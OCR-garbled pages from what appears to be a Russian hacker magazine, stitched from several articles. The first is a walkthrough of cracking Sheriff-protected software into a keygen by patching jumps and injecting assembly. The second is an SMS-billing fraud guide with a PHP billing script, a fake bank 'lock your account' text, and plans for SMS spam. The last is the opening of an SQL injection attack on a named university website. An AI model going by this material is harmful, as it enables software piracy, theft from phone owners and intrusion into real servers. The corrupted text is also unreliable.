0хА2 0х9Р 0x63 0х2Е 0x86 0x19 0x28 0x35 0x62 

0x41 0x61 ОхбБ 0x36 0x14 0x14 ОхбБ 0хВ8 ОхІБ 

ОхСА 0x8В ОхСЕ 0x92 0хС4 0х0Р 0x04 ОхЗВ 0x39 

0x43 0x63 0x39 ОхбР 0x45 0хБ5 0x41 0x11 0x43 

0x41 0x13 0хА5 0x07 0хБ2 0x04 0х8Е ОхРВ 0x9В 

0x44 0x64 0х9А 0x49 0x97 0x8В ОхІС 0x15 0x64 

0хВ7 0х5Б 0х0А 0х0Р 0x0В 0хБ9 ОхРВ 0x62 0x76 

Остается еще одна программа в папке Т00І_5 — БібРбп. Судя по описа- 
нию, человек покупает у у ЗбегіІГов некий номер (Ргосіисі 5І\І]. Вводит в 
эту утилиту и получает Ргосіисі Ю и Ргосіисі Бесгеів. Причем и в обычном, 
и в зашифрованном виде. Э-э-э... где-то здесь спрятан косяк. Л ибо про- 
грамма уже знает все комбинации, либо генерирует их на лету по входно- 
му номеру. В любом случае внутри этой маленькой программки есть код, 
переводящий обычные Ргосіисі Эесгеів в зашифрованные. Найдем его, 
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Іо чего похожие имена... 
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> ѵѵагпіпд 

Следует отда вать 
себе отчет в том, что 
эта статья была напи- 
сана исключительно 
в исследовательских 
целях и любые твои 
действия, нарушаю- 
щие законы страны, 
в которой ты прожи- 
ваешь, могутпривес- 
ти куголовной 
ответственности. 



затем обратим и получим код, переводящий зашифрован- 
ные Ргобисі: Зесгеіз в обычные. 

г ПОДМЕНА 

Для начала надо заставить ЗІзРзп вывести хоть что-нибудь. 
Суем ей «1 1 1 1-1 1 1 1-1 1 1 1-1 1 1 1». Ругается. Она права. Где там 
мой большой отладчик?! Ставим брейкпоинт на МеззадеВох. 
Жмем Ѳепега1:е. Брейкпоинтсрабатывает. Отлично, теперь 
ищем место, где принимается роковое решение нас отверг- 
нуть. В текущей процедуре решение уже принято, следова- 
тельно, надо искать выше. Вотвызовуровнем выше: 

00403ЕР7 РІІЗН ЕВХ ; /АгдЗ 

00403ЕР8 РІІЗН 10 ; | Агд2 = 00000010 

00403 ЕРА РІІЗН ЗІзРзп. 00422360 

; ІАгдІ = 00422360 АЗСІІ "Іпѵаіісі 
РгойисЦ Зегіаі ЫитЪег" 

00403ЕРР САЬЬ ЗІзРзп. 00418ЕЕЗ 

; \31зРзп. 00418ЕЕЗ 

Теперь надо его избежать. Видимо, условный прыжокчуть 
выше «00403ЕС2 75 7Е Л\І2 5Н0ВТ ЗІзРзп. 00403Е42» нам 
поможет. 

И действительно! Заменив его безусловным, мы добились 
того, что ЗІзРзп отработала, выдав нам необходимую ин- 
формацию. Информация на самом деле бесполезная... Но! 
Давай теперь внимательно посмотрим, что там происходит. 
Нам был нужен код, который из обычных Ргобисі Зесгеіз 
делает зашифрованные. Заново жмем кнопку бепегаіе и с 
нашего патчика начинаем трассировать программу. Видно, 
как с помощью каких-то алгоритмов и вшитых констант про- 
грамма вычисляет Ргобисі Ю. А по Ргобисі: Ю... считается 
РгосІисЬ Зесгеіь. Следовательно, зная РгосІисЬ Ю, мы можем 
вычислить Ргобисі Зесгеіз! Вот это косяк! 

Ситуация упрощается. Попробуем подменить только что 
сгенерированный Ргобисі Юуже известным нам «5366-8721- 
2229-7642-571 1 ». Вдумчивое наблюдение показывает, что в 
первый раз Ргобисі Ю мелькаетздесы 

00403Е95 ЬЕА ЕАХ,ШС!КО РТР 33: [ЕЗР+70] 

Тут-то мы его и подменим! Находим его в дампе и пишем туда 
«5366872122297642571 1 » вместо «52468953169332006300». 
Алгоритм отрабатывает, и на выходе мы имеем Ргобисі: 
Зесгеіз. Причем обрати внимание, что «зашифрованный» 
вариант этих секретов мы уже где-то видели. 

Копируем открытый вариант Ргосіисі Зесгеіз в ЗІ5Ѳеп. Запол- 
няем остальные поля. Запускаем еРіІт. Регистрируемся. По- 
лучаем Пеіегепсе Кеу. Генерируем себе лицензию. Вставляем 
в еРіІт. Работает! А значит, генератор лицензий у нас есть! И 
можно идти дальше пить кефир и жевать жвачку. 



^ НЕМНОГО КОДИНГА 

Работает на ура. Но для полной гегемонии хотелось бы 
избавиться от извращений с ЗІзРзп. Малоливмире жертв 
ВЬегіГГ зоДѵѵаге. Надо приготовить инструмент для быстрой 
генерации секретных ключей. Безусловно, можно выдрать 
из ЗІзРзп нужные алгоритмы и быстро склепать нужный 
Іооі. Но стоитли забивать свою голову глупыми алгоритма- 
ми, если есть другой способ — просто исправить ошибки в 
ЗІзРьп.Для начала отредактируем интерфейс. Здесь нам 
поможет редактор ресурсов. Сделаем поле ввода, текст 
«Ргобисі: 514:» и кнопку Неір невидимыми — все равно они 
не нужны. А удалять не стоит — могут посыпаться ошибки, 
например, от кода инициализации диалога. Передвинем 
остальные поля чуть повыше. Свойство РеасІ Опіу поля 
Ргобисі Ю выставляем в Раізе. Теперь Ргобисі: Ю можно 
редактировать. В качестве фона можно повесить свою 
фотографию. Ну или фотографию Джоанны Рутковской. Тру- 
хакерский интерфейс готов, теперь приступаем к редакти- 
рованию кода. 

Чтобы много не думать, мы припоминаем, где мы подменяли 
Ргобисі: Ю. Имеет смысл делать это там постоянно. Только 
теперь нам нужно вытаскивать код из Ес! ііВох’а и класть его 
в зз:[езр+70]. Обычно для этого я использую 6еЮ1дИ:етТехГ 
Но этой функции нет в таблице импорта ЗІзРзп. С таблицей 
импорта разбираться не хочется. К тому же есть обходной 
маневр: 

СеЦМіпсіоѵ/ТехІ: ( СеЦБІдІЦепДІіВІд, пІББІдІЦет) , 

ЬиГГег, ЬиГГег_1епдЫі) ; 

И обе функции у нас есть. На роль буфера подходит 
55:[Е5Р+70] с максимальной длиной, скажем, 5 * 4 (5 групп 
по 4 цифры) + 4 (4 дефиса) + 1 (для нуля) = 25= 19И. пЮОІдІІет 
подскажетлюбой редактор ресурсов, а Ьйід мы можем подгля- 
деть в одном из вызовов ЗеЮІдНетТехІ:. Или другим, более 
умным путем. ггТс — библиотека объектная. Следовательно, 

для вызовов применяется соглашение іЫзсаІА, иуказатель 

на текущий экземпляр класса (іЫз) передается в регистре есх. 
Мы находимся в одном из методов тіс-диалога, а значит... 

В любом случае правильный ответ — [есх+1 с], только вот есх 
сначала сохраняется в еЬр. Поэтому — [еЬр+1 с]. 

Нам остается найти место для нашего патча. Под нашим исправ- 
ленным джампом как раз образовалось много мертвого кода: 

00403ЕС2 ЛУІР ЗНОКТ ЗІзРзп. 00403Е42 

; здесь имеется ввиду 

00403Р41 КЕТЫ ; этот гебп включительно 

Так. Местау настоже вагон. Приступим к самому веселому! 



► 074 
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Лицензия принята 

г ЦИНИЧНЫЙ ПАТЧИНГ 

Помнится здесь мы подменяли Ргосіисі: Ю: 

00403Р95 БЕА ЕАХ,БШЕБ РТЕ 53: [Е5Р+7 0] 

00403Р99 РІІЗН ЕБХ 

00403Р9А РІІЗН ЕАХ 

Что ж... подменим теперь код: 

00403Р95 ТМР 31зРзп.00403ЕС4 

00403Р9А РІІЗН ЕАХ 

О ужас! Мы затерли один ризЬ. Не беда, конечно, но забыть о нем нельзя! 
Компилятор в целях выгоды не использовал стандартный кадр стека, и все 
стековые переменные адресуются относительно очень непостоянного езр. 
Дополнительная сложность. Теперь по адресу 00403ЕС4 надо расположить 
наш код. Я тут набросал кое-что: 

РІІЗН ЕСХ ; сохраняем есх 
РІІЗН ЕВХ ; сохраняем еЬх 
РІІЗН ЕБХ ; сохраняем есЬс 

; далее аргументы ОеЬБІдІІіет в обратном порядке — таково 
соглашение зБбсаІІ 

РІІЗН ЗЕ9 ; пІББІдШет 

РІІЗН БЖЖБ РТЕ БЗ: [ЕВР+1С] ; ЬБІд 

САЫі БѴЮЕБ РТЕ БЗ : [<&БЗЕЕ32 . СебБІдІ1:еш>] 

ЬЕА ЕБХ , БУЮЕБ РТЕ 33: [ЕЗР+7С] ; ЬиТТег 

; 70 сменилось 7С ввиду того, что кадр 
; стека поплыл за счет трех ризЬ'ей наверху 
; 3 * 4 байта = 12 байт = СЪ. байт 

РІІЗН ЕБХ ; кидаем в стек ЪиТТег (смотри ниже) 

РІІЗН 18 ; ЬиТТег_1епд1:]і 

РІІЗН ЕБХ ; ЬиТТег 

РІІЗН ЕАХ ; в еах — результат СеЦБІдІДеш, то есть искомый 
НШБ 

САЬЬ БѴГОЕБ РТЕ БЗ : [<&ІІ5ЕЕ32 . СеШіп(і(жТех1:А>] 

ІІЗЕЕ32 . СеШіпбо^ТехЦА 

РОР ЕАХ ; есіх, засунутый чуть выше, идет в еах 

; мы ведь потерли ЬЕА ЕАХ , БМОЕБ РТЕ 53: [Е5Р+70] , 

; а этой комбинацией мы восстановили справедливость 
РОР ЕБХ ; восстанавливаем есіх 



>> 




Наши искомые Ргосіисі: Эесгеів 

РОР ЕВХ ; восстанавливаем еЬх 

РОР ЕСХ ; восстанавливаем есх 

РІІЗН ЕБХ ; мы обещали не забыть об этом ризЬ'е 

ЛУІР ЗІзРзп . 00403Е9А ; прыжок назад, точно на ризЬ еах 

Отлично! Вбиваем патч в Олю и запускаем программу. СаІТы нужно 
вбивать, опираясь на значения в таблице импорта, а не на конкретные 
смещения! То есть не саіі 7Е4247РЕ, а САІ_І_ йѴѴОРО РТР 05:[41 0204]. 
Значения можно легко подсмотреть в Иде. Вбили — проверяем. 

И вотпервый косяк— кнопка бепегаіе задизейблена. Причем не науровне 
ресурсов, а программно. Что же нам делать? Давай размышлять! Кнопка 
— элемент диалога, а значит, у нее есть номер. Чтобы выполнить любую 
операцию над кнопкой, надо в стек засунуть ее номер. Причем наша кнопка 
уникальна во всех смыслах, то есть в циклах ее обрабатывать не будут. 

Номер нашей кнопки 1 004 = ЗесЬ. Поищем ризЬЗес в Иде. Таки есть — на- 
шелся. И как раз рядом с вызовом 5ЬоѵѵѴѴіпсІо\л/. Обратим внимание, что чуть 
выше в стек кладется ноль: 

00403БЕ1 ХОЕ ЕБХ , ЕБХ 



00403БЕЕ РІІЗН ЕБХ 

Этот ноль — аргумент для 5 Ь оѵѵѴѴі п сі оѵѵ. Причем когда он нулевой, это зна- 
чит«выключить», а когда ненулевой — «включить». Места, чтоб изменять 
ебх, у нас нет. К тому же его потом опять придется восстанавливать — скорее 
всего, этот ноль где-то еще используется. Но ведь есть же регистр, который 
всегда ненулевой! Указатель стека евр, к примеру. 

00403БЕЕ 54 РІІЗН Е5Р 

Перезапускаем. Применяем патчи. Работает! Это странно, но очень радост- 
но. Осталось лишь сохранить изменения, и генератор готов. 

Впрочем, тутеще есть, над чем поработать. Кпримеру, можнодоба- 
вить фильтры для входящей строки, допуская любые комбинации: 
«ХХХХХХХХХХХХХХХХХХХХ», «ХХХХ-ХХХХ-ХХХХ-ХХХХ-ХХХХ» и даже «ХХХХХХХХ 
ХХХХ ХХХХ ХХХХ». Стоит сделать п ростую за щиту от ду ра ка . . . 

^ ЗАКЛЮЧЕНИЕ 

Итак, налицо метод получения генераторов лицензий для любых программ, 
защищенных с помощью 5бегіИѵЗ.О. Хитрость защиты строится на неве- 
дении алгоритмов и запутанной системе лицензий, разобраться в которой 
можетторговец, но не математик. Такая защита себя не оправдывает, 
алгоритмы узнаются, либо обходятся, а систему всегда можно обыграть по 
ее же правилам, цц 
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ЮЗАЕМ 5М5-БИЛЛИНГИ В СВОИХ ЦЕЛЯХ| 
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Сейчас уже трудно кого-то удивить безналичным расчетом с помощью кредитки или 
электронной платежной системы. Большинство необходимых вещей можно оплатить 
мгновенно, не выходя из дома/офиса и не заморачиваясь с доставкой. Но вот незадача: 
несмотря на то что количество пользователей всевозможных платежек растет, охватить 
всю аудиторию потенциальных клиентов продавцам все равно не удается. В такой ситуа- 
ции самые предприимчивые инет-шопы начали принимать зтз-платежи. А что? Согла- 
сись, удобно: мобильник-то есть у каждого, а значит, клиент всегда сможет оплатить 
товар. Думаю, намек ты понял :). О скамах, фишинге и прочих видах сетевого «заработ- 
ка» я писал в одном из прошлых номеров, но, поверь, это далеко не все. Именно поэтому 
сейчас я расскажу тебе о том, как заюзать зтз-биллинги и зтз-платежи в своих целях. 
Только не забывай, что вся инфа предоставляется мной исключительно для ознакомле- 
ния. Готов? Тогда поехали. 



Н АЗАЧЕМ0Н0НАМ? 

Полагаю, что утебя все еще остались смутные сомнения по поводу необхо- 
димости использования зтз-платежей. Чтобы развеять их окончательно, 
давай прикинем, каков будет откликсо спама/нагона трафа натвой фейко- 
вый сайт банка/платежки и отчего он, собственно, зависит. Естественно, 
результат во многом связан с качеством спам-баз и продолжительностью 
функционирования ифреймов, но для нас это не столь важно. Сейчас 



нужно понять одно — все люди юзают разные платежные системы и банки, 
следовательно, наколбасив фейк какой-то одной конторы, ты можешь не 
получить желаемого результата. В то же время у каждого человека есть 
мобильник, а значит, шансы на получение оплаты путем зтз-платежа резко 
возрастают. 

Каким образом мы будем этот платеж выманивать, рассмотрим позже, а 
пока плавно переходим к вопросу, как замутить такой вид оплаты само- 
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СЫЦШ ЗКЛ^ЗѴ іифЛПЬГ 
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Юзаем Бгпз-биллинг 



стоятельно. Сразу скажу, что без помощи Бгпз-биллингов нам не обойтись. 
Для тех, кто с подобным зверем сталкивается впервые, коротко поясню: 
зтз-биллинг представляет собой контору, которая является чем-то вроде 
посредника между шопом, принимающим оплату по бгпб, и клиентом, 
готовым эту бгпб отправить :). Проще говоря, биллинг предоставляет нам 
в аренду короткий номерок, например 6644, и идентификатор, а вдобавок 
обрабатывает все платежи и производит выплаты в удобном для нас виде 
(ѴѴеЬтопеу, Едоісі, еіс). Взамен контора берет нехилый процент от нашей с 
тобой прибыли, порой он достигает 45-60%. 

Следующий немаловажный момент— переченьуслуг, предоставляемых 
5гп5-билл ингом. Описать все существующие фишки и нюансы, присутст- 
вующие у разных контор, какты понимаешь, не представляется возмож- 
ным. Поэтому я перечислю пару-тройку основных, без которых биллинг 
не биллинг :). Итак, далее по списку: 1 ) «бгпб-ключ», 2) «зглэ-сейф», 3) 
«БітіБ-банк». 

Не зацикливай особо свое внимание на названиях, поскольку у разных 
контор они могут отличаться, но суть везде одна и та же. Вкратце выделим 
особенности каждой из услуг. 

Первым номером и базовой услугой любого зтз-биллинга является 
«БгпБ-кл юч». Ты, наверное, видел сайты (как правило, продающие трЗ, 
книжки, порну... :)], которые просятскинутьБГпз’ку на номерХХХХи вбить в 
авторизационное окошко пришедший в ответе код для получения доступа 
к контенту. Вот это и есть принцип действия услуги «бгпб-кл юч». Но здесь 
есть одно значительное ограничение — сумма, которая можетбыть снята с 
мобильного счета юзера, не должна превышать допустимый предел (обыч- 
но не более $5). 

О том, каковы плюсы и минусы этого ограничения, я расскажу во второй 
части статьи, а сейчас перемещаемся на второй пункт — «эта-сейф». 
По своему функционированию эта услуга схожа с предыдущей, за ис- 
ключением одного отличия — сумма транзакции увеличена (примерно) 
до $30. Кроме того, подобные платежи требуют подтверждения от опе- 
ратора. Поэтому, во-первых, на проверку транзакции сотовым операто- 
ром уходит время (не более 24 часов), а во-вторых, пока не завершена 
сессия по первой транзакции, вторую с этого же номера открывать 
нельзя. Такого рода антифрод может оказаться весьма неудобным для 
нас, но об этом позже. 

Третья и последняя из основныхуслуг — «зтз-банк». Она имеетопреде- 
ленные сходства с первыми двумя, но позволяет осуществлять более круп- 
ные платежи. Правда, в этом случае клиенту следует за пол нить подробный 
бланктранзакции, после чего опять же необходимо дожидаться подтвер- 
ждения платежа. 

В общем, какты понял, чем больше суммы зта-платежа, тем больше 
геморроя с антифродом, что вполне логично. Что ж, думаю, в общих чертах 
механизм работы БітіБ-биллингов тебе понятен, в следующей части статьи 
мы подробнее остановимся на деталях и попробуем немного поюзать бпгіб- 
платежи в своих целях :). 



^ ДЕЛАЕМ ДЕНЬГИ 

Теперь настало время перейти кболее интересной и познавательной 

— практической — части :). Здесь есть несколько вариантов, нотак или 
иначе все они сводятся к открытию своего интернет-шопа. Кстати, в Сети 
существуют партнерки, предоставляющие уже готовые движки, подклю- 
ченные ката-биллингу. Суть подобного бизнеса проста: они даюттебе все 
(двиг/хостинг/биллинг), а твоя задача — продавать ихтовар за опреде- 
ленный процент от прибыли. Но связываться с таким и конторами я бы не 
советовал. Во-первых, нормальные деньги заработать там очень сложно, а 
во-вторых, среди подобных партнерок немало кидал. 

Поэтому мы пойдем другим путем :). Я не знаю, что бы ты стал продавать 
в своем шопе — картон/соксы/уины или что-то другое, да и не в этом суть 

— описанный ниже пример привязки ресурса кетз-биллингу фактически 
универсален. Однако на самом деле мы ничем торговать не будем. Да-да, 
ты не ослышался, не зря ведь в названии статьи упомянуто ласкающее 
слух слово «фрод» :). Схема такова: мы создаем ресурс, привязываем его к 
БгпБ-биллингу, сочиняем убедительную фрод-мессагу, которую рассылаем 
БгпБ-спамом, заставляя таким образом владельца мобильника поделиться 
с нами деньгами. Исполнение задуманного может показаться нереальным, 
но это далеко не так, сейчас ты и сам в этом убедишься :). Для начала соста- 
вим план активных действий: 

1 . Выбор БгпБ-биллинга и привязка нашего ресурса к нему. 

2 . Выбор региона работы. 

3. Составление фрод-мессаги. 

4 . Спам. 

С выбором биллинга я тебе помогу — ѵмѵуѵ.бгпбсоіп . сот . Эта контора 
достаточно популярна среди многих моих знакомых, поэтому в качестве 
примера заюзаем именно ее. Правда, в последнее время качественный 
уровень антифрода значительно вырос (надо отдать должное администра- 
ции биллинга), но на данном этапе нам важно понять принцип реализации 
фрод-схемы, а деньги заработать ты всегда успеешь :). 

Итак, биллингесть. Далее необходимо определиться с методом оплаты. 
Воттутне поленись еще раз пробежаться по первой части статьи. Как я 
говорил, моментальное снятие денегс мобильного счета (а это как разто, 
что нам нужно :)) возможно только при использовании услуги «бгпб-ключ». 
Несмотря нато что стоимость одной бгпб’ки ограничена $5, нам это вполне 
подходит. 

Осталось только выбрать «поле боя» в виде какой-либо страны. К приме- 
ру, пусть это будет Великобритания. Наш биллинг работаеттам со всеми 
крупными операторами сотовой связи, да и тариф весьма заманчивый: 
максимальная стоимость бгпб — 5 ОВР, а наш стобой процентотэтой 
суммы — 45%. 

В общем, осталось всего ничего — пара пунктов из нашего плана :). Сперва 
следует заняться привязкой собственного ресурса кетз-биллингу. Для 
этого потребуется добавить втвой двигскрипт, поддерживающий коннектс 
биллингом и содержащий формочку авторизации (в которую человек, 
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Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомле- 
ния! Ни автор, ни 
редакция за твои 
действия ответст- 
венности не несут! 







> ІП^О 

Все основные ас- 
пекты и премудрости 
зтз-спама ты мо- 
жешь найти в статье 
РогЬ’а «Мобильная 
рассылка» (январь 
2007 года]. 




отославший 5ГП5, будет вбивать полученный в ответной зтз’ке 
код). Сорец подобного РНР-скрипта — ниже (АЗР’шная и 
Регі’овая версии лежат на нашем ОѴО): 

<?р!ір 

### зтз:кеу ѵі.0.4 ### 

$кеу = идентификатор_ключа ; 

$гезропзе = ітріосіе ( " " , бііе («Ьккр: //иденти- 
фикатор_группы . кеу . зшзсоіп. сот/кеу/?з_кеу= " 

. $кеу 

. "&з_раіг=" . игіепсосіе (зиЬзбг ( $_СЕТ [ "з_ 
раіг" ] , 0 , 10) ) 

. "&з_1апдиаде=" . игіепсойе (зиЬзбг ( $_ 

СЕТ [ " з_1апдиаде " ] , 0, 10)) 

. " &з ір— " . $_ЗЕКѴЕК [ " КЕМОТЕ_АББК " ] 

. "&з_иг1=" . $_ЗЕКѴЕК [ " 8ЕКѴЕБМЯАМЕ " ] 

. кктіепкіісіез (игіепсосіе ($_ 
зекѵек [ ,, ке<2ііезт_ші "])))); 
іб($гезропзе != "Сгие") { 
сііе ( $гезропзе) ; 

} 

### зшзгкеу епсі ### 

?> 

Требуется лишьуказать свой идентификатор зтз-ключа и 
идентификатор группы (выдаются при регистрации в бил- 
линге). Кроме того, по дефолту используется русская версия 
сервиса, что нам абсолютно не подходит. Поэтому меняем в 
третьей строке «Ьир://идентификатор_группы.кеу.5гп5соіп. 




Номера мобильников во взломанной ■ 



сот/кеу/?5_кеу=» на «Ьир://идентификатор_группы.кеу. 
5т5соіп.сот/Іапдиаде/епдІІ5Ь/кеу/?5_кеу=». Все остальные 
прибамбасы зависят целиком и полностью от фантазии :). 
Вариантов мессаги, которая будет выдаваться после ввода 
кода, масса: начиная от банальной фейковой ошибки и 
заканчивая официальным уведомлением. Зацикливаться на 
этом мы не будем. Сейчас необходимо грамотно составить текст 
фрод-мессаги. Исходить надо из того, что распространять ее 
мы будем путем зтз-спама, а значит, сообщение должно быть 
относительно коротким и четко сформулированным. Например: 

«Беаг сііепк, ѵ?е доб гедиезб До іоск уоиг шоЬіІе 

ассоипк , уои зЪоиІсІ зепсі зшз ко пишЬег ХХХХ» 

Можно послать месса гуотимени банка, мобильного оператора, 
полицейского департамента ит.д. Здесьопятьже все упирается 
только в знание языка и желание экспериментировать. 
Последний ответственный этап — зтз-спам. Рассматривать 
его не имеетсмысла, поскольку РогЬ в своей статье «Мо- 
бильная рассылка» (январь 2007 года) подробно изложил 
суть вопроса, приатачив к мануалу еще и мой генератор 
телефонных номеров :). 

^ Р05Т5СтРТ1Ж 

Надеюсь, прочитав статью, ты получил пищу для размышле- 
ний. Хочется верить, что размышления эти подтолкнут те б я 
в правильном направлении, ведьфродака мошенничество 
является уголовным преступлением (ст. 1 59 УК РФ). Не 
ведись на легкие деньги и быстрый заработок, тебе вполне 
под силу придумать свою схему, которая не только принесет 
доход, но и окажется менее рискованной. Со своей стороны 
могу обещать только посильную помощь и бесплатные 
советы :]. Пробуй, ведь все, что было просто, уже сделали до 
тебя. □с 




У меня приятель работает в 
ѴѴеЬтопеу. Могу сразу сказать: они 
сейчас кошельки лочат пачками, 
по поводу и без. Бизнес понятный: 
лочится подозрительный кошель, 
и если деньги человек не совсем 
легально получил, то он не будет 
разбираться. 



Да уж, понятное дело. Хотя все 
равно на 5М5-фроде и прочем 
нелегале люди сейчас немало 
поднимают. 
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МИ Н 3 Д РА ВСОЦ РАЗ ВИТИЯ РОССИИ ПРЕДУПРЕЖДАЕТ: 

КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ 



- Г арнитура Зеппбеізег РС 161 ІІЗВ 

Нет! Это не просто микрофон с наушниками. Компания Зеппііеізег 
специально разработала эту модель для самых придирчивых потребителей. 
Для тех увлеченных парней, которые требуют самую полную звуковую 
картину и не признают даже намека на фальшь. Зеппбеізег РС 161 ІІЗВ 
может предложить им как раз то, что нужно: кристально чистый звук и 
максимальный реализм, достигаемый за счет технологии 30-звучания. 
Поверь: с обычной гарнитурой ты такого не услышишь. 

Примерная цена: 3500 руб. 



- Монитор ѴіеѵѵЗопіс ѴХ922 19” 

Реально качественный монитор по адекватной цене. Если тебе надоело 
щуриться перед ЭЛТ прошлого века и ты выбираешь качественный /_С0- 
моник, эта модель однозначно для тебя. Максимальное разрешение 
1280x1024, контрастность 650:1 , время отклика 2 мс и запредельные углы 
обзора. Все для тебя по справедливой цене! Примерная цена: 8000 руб. 



- ИБП АРС ВАСК-ІІРЗ СЗ 500 

В России не все гладко с электроснабжением. То напряжение 
скачет, то частота убежала от номинала, а могут и вообще 
свет вырубить. Чтобы твой комп не страдал от таких вещей, 
нужно воспользоваться бесперебойником от легендарной 
фирмы АРС, которая предлагает тебе решение всех проблем. 
I Блок нормально переваривает почти любые скачки входного 
сигнала. То, что надо! Примерная цена: 1500 руб. 



- ІІЗВ ѴѴі-Рі карта АЗІІЗ Ш-160Ѵ/ 

Давно прошли времена, когда словом ѴѴі-Рі можно было кого-то удивить. ѴѴІ-РІ сети 
прочно вошли в нашу жизнь. Казалось бы, что может поменяться? Только сам ѴѴІ- 
РІ. Новый стандарт 802. 1 1п стучится в наши двери и это потрясающая технология! 
Максимальная скорость в новом стандарте составляет 270 МЬрз. По воздуху! Чтобы 
заценить новый стандарт, рекомендуем эту карточку. Примерная цена: 2800 руб. 



- МФУ Затзипд СРХ-2160Ы 

За унылой аббревиатурой МФУ прячется настоящий монстр! Этот девайс 
сочетает в своем корпусе возможности принтера, сканера и копира. Также он 
оснащен сетевухой, что позволит тебе легко подключить его к сети. Ценная 
фишка - это легкозаменяемые картриджи, для доступа к которым достаточно 
открыть переднюю панель. Скорость работы устройства так же впечатляет: пять 
страниц распечатаются в цвете за 83 секунды. 



С&ічж СуііШСІѲуОТ ОГПСМ КМ 'ННСПОДОЕШЙСОР ноюрьи} рОЯЯУШ 

«осуг сдслаіи ню*о мигии- уло'Зме, м&уг пшочі тебе 
(ЖІІЙГЬ сем РФ0ФЧ4 ОСкЦКЧИ. рЙЭ№МВПСЯ И 
Разнообразий левз^мн стань м-лино чискьЛрать 
дойсгшига-лы» качественнее и фуню^ионьг-ьнм устройстве 
мл прррплачиваті л питии г - ічспабли мшчй, Эту зилдчу 

для тебя решил ѴѴитді Ьу Йіігтшсп агд-лшводсіи '■качківенмын 
мощи ла еіфйдвд"н!'С*< ченв- НаеллмдайолІ 





взлом 



ИДЕАЛЬНЫЕ 

ПОДОПЫТНЫЕ 



СТАНОВИМСЯ АДМИНАМИ УНИВЕРСИТЕТСКИХ САИТОВ 



ЕВГЕНИЙ «СОВѴѴІІЧ» 


ЕРМАКОВ 


ДМИТРИЙ «ОЕЭ МІІ5ТОІЕ» СЕРЕБРЯННИКОВ| 


/ ЕПМАКОѴ@САМЕІ.АЫО.ГШ / 


/ тиоз СОТ КАМВІ_ЕР.ЯІІ / 



Началась студенческая жизнь. Студенты мирно пропускают пары, даже не вспоминая, 
что скоро их мозг погрязнет в подготовке к сессии, преподы нарабатывают материалы 
для будущих семинаров и экзаменов, а хакеры ищут новых жертв, чтобы нещадно взло- 
мать. Взламывать универ, как нам показал КОісі в августовском «Хакере», вдвойне при- 
ятно. А сегодня мы удвоим это удовольствие, насладившись сразу двумя интересными 
взломами от умных парней. А ты сиди и конспектируй, студент :) ! 



В ЫЕѴѴ50Е5К.ЦМ0.Е01І, ИЛИ СТУДЕНЧЕСКИЙ 
ПРИВЕТ ОТ СОКММЫ'А 

Доводы о том, что сайты, относящиеся к правительственным и госструкту- 
рам, хорошо написаны и защищены, совершенно бесплотны. Некоторые 
мои знакомые пачками ломаюттакие порталы, поднимая на этом неплохую 
денежку, которой хватает на мороженное и не только :). Мне и самому пару 
раз приходилось выполнять заказы на взлом серверов в определенной 
зоне, но в этот раз для «опытов» (о которыхты можешь прочесть в одной из 
моих недавних статей) мнетребовался сервер с определенной СУБД и... Тут 
подвернулся безобидный университет штата Мэриленд. 

В этот раз мне не хотелось делать все вручную и было решено задейство- 
вать ХБрісІег, но прошло довольно продолжительное время,аХ5рісІегвсе 
молчал и не могдаже толком определить открытые порты. Хорошо, неттак 
нет, бьем в лоб — такая тактика меня редко подводит:). И, начав ковыряться 
вручную, я не ошибся — первый же проверенный скрипт был уязвимым. 
Параметр АгбсІеЮ в скрипте новостей геіеазе.сі'т совершенно не 
фильтровался. Подставив кавычку кзначению АгбсІеЮ, я получил ответ 
сервера, который предоставил мне столько информации, что судьба сайта 
сразу оказалась предрешенной :). Портал вообще представлял собой один 
большой баг, он был настолько коряво написан, что такое даже сложно себе 
представить: абсолютно все скрипты были уязвимыми, на каждом шагу 
сервер выплевывал ошибки. Видимо, движок, какобычно, писали студенты 



— горе-кодеры. Кстати, получилась довольно-таки экзотическая связка: 
СоШРивіоп+ОгасІе. Отличный полигон для отработки навыков :). 

Сам ответ сервера: 

Еггог Ехесибіпд БабаЪазе Оиегу. 

[Масгошейіа] [Огасіе ^ВС Бгіѵег] [Огасіе] ОКА-00933 : ЗОБ 
соттатЗ поб ргорегіу епсіесі 

ТЬе еггог оссиггесі іп /абз/ .діие .итсі. есіи/сіерагбтепб/ 
оіб/еіз/меЪЬозбіпд/пемзсІезк/ІібсІосз/ипііпі/геІеазе . сбт: 
Ііпе 21 

19 : ЗЕЬЕСТ ІБ, СОЫТАСТЗ , КЕЬЕАЗЕ_БАТЕ , КЕЕ, бібіе 

2 0 : РКОМ АКТІСБЕШРО 

21 : ШЕКЕ ІБ = #ШБ . АгбісІеІБ# 

22 : </СРОБЕКУ> 

Какмы видим, поошибке выбирается 5 колонокиз таблицы АПТІСбЕІЫРО. 

^ А НА ЧЕМ ВСЕ ЭТО ПАШЕТ 

Внимательный читательуже, наверное, заметил, что я имею дело не с 
обычным РРІР-движком, а с СоІсІРизіоп(СР). Для тех, кто незнаком с этой 
технологией, сообщаю: это интерпретатор, а точнее, сервер приложений, 
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Др^рург к этому^айлу'^ йз'вэба 



Именно он станетжертвой... 



который обрабатываетСРМ-сценарии. Сами же файлы с расширением СРМ 
написаны на языке СоІсІРизіоп Магкир. 

Я помнил, что при реализации построения систем на СоісіРіівіоп админи- 
страторами почти всегда допускаются грубейшие ошибки. Имелось что-то 
вроде джентльменского набора багов в Соісі Ризіоп :). Первым делом я полез 
в систему управления СР — СоШРивіоп Асітіпізітаіог. Перейдя по адресу 
пеѵузбезк.итб.еби/СРІРЕ/асІгпіпізІгаіог/іпсІех.сіт . я сильно обломался 
— апачевая авторизация. Видимо, админы не былиужполными... неумны- 
ми людьми и хоть о чем-то позаботились. 

Также я держал в головето, что иногда при неправильной конфигурации 
СРизіоп можно получить дополнительную информацию, добавив пере- 
менную сіебид с значением, равным единице. Ріо запрос пеѵѵзсіезк.итсі. 
ес!и/си11:иге/геІеа5е.сІт?АгІісІеІР=1486&сІеЬид=1 . та кже ка к и пеѵѵзсіезк. 
итб.еби/сиІЩге/геІеазе.сі : т?Агбс[еІР=1486&тосІе=сІеЬид . ничего не дал, 
кроме ошибки (хотя в этой ошибке, как я уже говорил, информации было 
более чем достаточно). 

^ БЬЕМ В ЛОБ 

Тогда было решено просто внедрять 50І_-операторы, то есть провести 50І_- 
ігцесііоп. Благо синтаксис Оракла я знал неплохо (читай в недавней статье 
«Разрушая базы»). 

